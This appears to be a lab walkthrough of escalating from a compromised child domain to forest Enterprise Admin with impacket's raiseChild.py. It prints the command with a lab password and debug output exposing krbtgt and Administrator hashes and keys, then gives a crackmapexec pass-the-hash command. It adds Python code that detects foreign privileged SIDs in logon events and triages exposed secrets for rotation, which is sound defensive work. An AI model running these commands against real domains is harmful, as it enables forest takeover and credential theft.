RaiseMeUp - Escalate with impacket raiseChild

  • OK, now imagine you have pwned the domain north.newyork.local: you have dumped the NTDS and you hold the NT hashes of every user in the north domain.

As Microsoft itself says, a domain trust is not a security boundary.


  • The simplest way to escalate from the child domain to the parent is impacket's raiseChild.py script; it does all the work for us.

raiseChild.py north.newyork.local/fernando.alonzo:IDr1R3allyF@sTF1!

$raiseChild.py north.newyork.local/fernando.alonzo:IDr1R3allyF@sTF1! -debug -ts
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[2023-03-07 12:38:36] [+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket-0.10.1.dev1+20230216.13520.d4c06e7f-py3.9.egg/impacket
[2023-03-07 12:38:36] [+] Calling NRPC DsrGetDcNameEx()
[2023-03-07 12:38:36] [*] Raising child domain north.newyork.local
[2023-03-07 12:38:36] [*] Forest FQDN is: newyork.local
[2023-03-07 12:38:36] [*] Raising north.newyork.local to newyork.local
[2023-03-07 12:38:36] [+] Calling LSAT hLsarQueryInformationPolicy2()
[2023-03-07 12:38:36] [*] newyork.local Enterprise Admin SID is: S-1-5-21-620482180-1620433373-1814187987-519
[2023-03-07 12:38:36] [*] Getting credentials for north.newyork.local
[2023-03-07 12:38:36] [+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=north,DC=newyork,DC=local
north.newyork.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b215421b300eb02228f7b4e8f8414201:::
north.newyork.local/krbtgt:aes256-cts-hmac-sha1-96s:b85d7acc1aba6e1edb419d7b6735eeeb4014eb43731e9b4df9f525cb0d036f2e
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] VALIDATION_INFO before making it gold
[2023-03-07 12:38:36] [+] Getting TGS for SPN cifs/NYC
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NEWYORK.LOCAL
[2023-03-07 12:38:36] [*] Getting credentials for newyork.local
[2023-03-07 12:38:36] [+] 192.168.56.10 is NYC.newyork.local
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=newyork,DC=local
newyork.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9bd3def911c72eaa484fc6a302f3a08b:::
newyork.local/krbtgt:aes256-cts-hmac-sha1-96s:4860355d58ab70fb7446b46de1e21a430ff34234bda82c2498976f59cb5a7b48
[2023-03-07 12:38:36] [*] Target User account name is Administrator
[2023-03-07 12:38:36] [+] 192.168.56.10 is NYC.newyork.local
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Decrypting hash for user: CN=Administrator,CN=Users,DC=newyork,DC=local
newyork.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
newyork.local/Administrator:aes256-cts-hmac-sha1-96s:bdb1a615bc9d82d2ab21f09f11baaef4bc66c48efdd56424e1206e581e4dd827

  • This creates a golden ticket that grants forest Enterprise Admin rights (the Enterprise Admin SID shown in the output above).

  • It then logs into the forest and retrieves the target account's secrets (default target: Administrator, RID 500).

  • All the work is done by one command; if you are lazy you don't even need to understand it x)
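Since the attacker side collapses to a single command, it is worth seeing what the forest root DC can be watched for. The Python below is an added example for this page, not impacket or GOAD code: it scans records shaped like Windows event 4627 (Group Membership Information) for a logon whose token carries a privileged group SID (Enterprise Admins RID 519, Domain Admins RID 512, ...) of a domain other than the account's own, which is the footprint a forged ticket with the root Enterprise Admin SID leaves when a child-domain account reaches the parent. The forest SID prefix is the one printed in the raiseChild output above; the child domain prefix, the account RIDs and the records themselves are constructed, and the field names are modelled on the 4627 schema.

```python
"""Flag logons whose token holds a privileged SID from a foreign domain.

Added example for this page (not impacket/GOAD code). The event records are
constructed; field names follow the Windows 4627 (Group Membership) schema.
"""
import re
from dataclasses import dataclass

# Well-known RIDs that a token should never carry from a domain other than
# the account's own. Seeing the forest root's RID 519 on a child-domain
# account is the signature of this child-to-parent escalation.
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

# Domain SIDs are S-1-5-21-<three 32-bit subauthorities>-<RID>.
SID_RE = re.compile(r"^S-1-5-21-(\d+)-(\d+)-(\d+)-(\d+)$")


def split_sid(sid: str):
    """Return (domain_identifier, rid) for a domain SID, or None for
    built-in / well-known SIDs such as S-1-5-32-544."""
    m = SID_RE.match(sid)
    if not m:
        return None
    return ("-".join(m.groups()[:3]), int(m.group(4)))


@dataclass
class Alert:
    account: str
    account_domain: str
    foreign_sid: str
    group: str


def foreign_privileged_sids(account_sid: str, token_sids):
    """Privileged group SIDs in the token whose domain differs from the
    domain the account itself belongs to."""
    parsed = split_sid(account_sid)
    if parsed is None:
        return []
    own_domain, _ = parsed
    hits = []
    for sid in token_sids:
        p = split_sid(sid)
        if p is None:
            continue
        domain, rid = p
        if rid in PRIVILEGED_RIDS and domain != own_domain:
            hits.append((sid, PRIVILEGED_RIDS[rid]))
    return hits


def detect(events):
    """Run the check over 4627-shaped records and return one Alert per hit."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4627:
            continue
        for sid, group in foreign_privileged_sids(ev["TargetUserSid"], ev["GroupMembership"]):
            alerts.append(Alert(ev["TargetUserName"], ev["TargetDomainName"], sid, group))
    return alerts


# Forest root prefix taken from the page's output; child prefix is hypothetical.
FOREST = "S-1-5-21-620482180-1620433373-1814187987"
CHILD = "S-1-5-21-111111111-222222222-333333333"  # constructed north.newyork.local prefix

SAMPLE_EVENTS = [  # constructed records, not real logs
    # benign: forest Administrator whose groups are all from its own domain
    {"EventID": 4627, "TargetUserName": "Administrator", "TargetDomainName": "NEWYORK",
     "TargetUserSid": f"{FOREST}-500",
     "GroupMembership": [f"{FOREST}-512", f"{FOREST}-519", "S-1-5-32-544"]},
    # suspicious: child account whose token carries the forest Enterprise Admins SID
    {"EventID": 4627, "TargetUserName": "fernando.alonzo", "TargetDomainName": "NORTH",
     "TargetUserSid": f"{CHILD}-1105",
     "GroupMembership": [f"{CHILD}-513", f"{FOREST}-519", "S-1-5-32-544"]},
    # benign: child account with only child-domain groups
    {"EventID": 4627, "TargetUserName": "svc_backup", "TargetDomainName": "NORTH",
     "TargetUserSid": f"{CHILD}-1200",
     "GroupMembership": [f"{CHILD}-513", f"{CHILD}-1201"]},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[!] {a.account_domain}\\{a.account} holds {a.group} of a foreign domain: {a.foreign_sid}")
```

The check keys on the SID prefix rather than on group names because the forged SID is resolved to a perfectly ordinary "Enterprise Admins" name once it reaches the root DC; only the domain part of the SID gives it away. This is also why the page's point about Microsoft and trust boundaries matters: inside a forest the root's Enterprise Admin SID is honoured from the child by design, so the detection has to live on the root DC rather than in the trust configuration.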

Authenticate with the dumped hash to verify that the dump is good:

crackmapexec smb 192.168.56.10 -u Administrator -H ":c66d72021a2d4744409969a581a1705e" -d newyork.local
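Once a hash from that output has been confirmed to work, the incident-response side is the inverse problem: which secrets are now burned and what has to be rotated. The Python below is an added example for this page, not impacket code; it parses the secretsdump-style lines that raiseChild prints (`domain/user:rid:lm:nt:::` and `domain/user:etype:key`, tolerating the stray `s` after `96` in the page's output) into a per-account list with the standard remediation for each, ordering the forest root krbtgt first. The sample text is the page's own lab output.

```python
"""Triage of secrets exposed in secretsdump-style output.

Added example for this page (not impacket code). Sample lines below are the
page's own lab output; the rotation rules are standard guidance.
"""
import re
from collections import defaultdict

# domain/user:rid:lmhash:nthash:::
NT_LINE = re.compile(
    r"^(?P<domain>[^/]+)/(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)
# domain/user:aes256-cts-hmac-sha1-96:key  (optional trailing 's' as on the page)
KEY_LINE = re.compile(
    r"^(?P<domain>[^/]+)/(?P<user>[^:]+):"
    r"(?P<etype>aes\d+-cts-hmac-sha1-96s?|des-cbc-md5):(?P<key>[0-9a-f]+)$"
)


def parse_dump(text):
    """Group every exposed secret by (domain, user); log lines are skipped."""
    accounts = defaultdict(lambda: {"rid": None, "nt": None, "keys": []})
    for line in text.splitlines():
        line = line.strip()
        m = NT_LINE.match(line)
        if m:
            a = accounts[(m["domain"], m["user"])]
            a["rid"] = int(m["rid"])
            a["nt"] = m["nt"]
            continue
        m = KEY_LINE.match(line)
        if m:
            accounts[(m["domain"], m["user"])]["keys"].append(m["etype"])
    return dict(accounts)


def remediation(domain, user, rid):
    """Standard action for an exposed secret, keyed on the well-known RID."""
    if rid == 502 or user.lower() == "krbtgt":
        return (f"reset krbtgt of {domain} twice, waiting for replication between resets; "
                "tickets forged with the old key stay valid until the second reset")
    if rid == 500:
        return f"reset the built-in Administrator of {domain} and review its recent logons"
    return f"reset the password of {domain}\\{user}"


def triage(text):
    """Return remediation records, forest root first and krbtgt before others."""
    out = []
    for (domain, user), info in parse_dump(text).items():
        out.append({
            "domain": domain, "user": user, "rid": info["rid"],
            "has_nt": info["nt"] is not None, "keys": info["keys"],
            "action": remediation(domain, user, info["rid"]),
        })
    # fewer dots = closer to the forest root; rid 502 sorts before the rest
    out.sort(key=lambda r: (r["domain"].count("."), r["rid"] != 502))
    return out


# Sample text copied from the page's raiseChild output (lab values).
SAMPLE = """
[2023-03-07 12:38:36] [+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=north,DC=newyork,DC=local
north.newyork.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b215421b300eb02228f7b4e8f8414201:::
north.newyork.local/krbtgt:aes256-cts-hmac-sha1-96s:b85d7acc1aba6e1edb419d7b6735eeeb4014eb43731e9b4df9f525cb0d036f2e
[2023-03-07 12:38:36] [*] Getting credentials for newyork.local
newyork.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9bd3def911c72eaa484fc6a302f3a08b:::
newyork.local/krbtgt:aes256-cts-hmac-sha1-96s:4860355d58ab70fb7446b46de1e21a430ff34234bda82c2498976f59cb5a7b48
newyork.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
newyork.local/Administrator:aes256-cts-hmac-sha1-96s:bdb1a615bc9d82d2ab21f09f11baaef4bc66c48efdd56424e1206e581e4dd827
"""

if __name__ == "__main__":
    for r in triage(SAMPLE):
        print(f"{r['domain']}/{r['user']} (rid {r['rid']}, keys {r['keys']}): {r['action']}")
```

Ordering the root krbtgt first is deliberate: as long as its old key is valid, any golden ticket minted with it keeps working no matter what is done in the child, so that reset (done twice) is the step that actually ends the access.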

smbexec.py whoami????
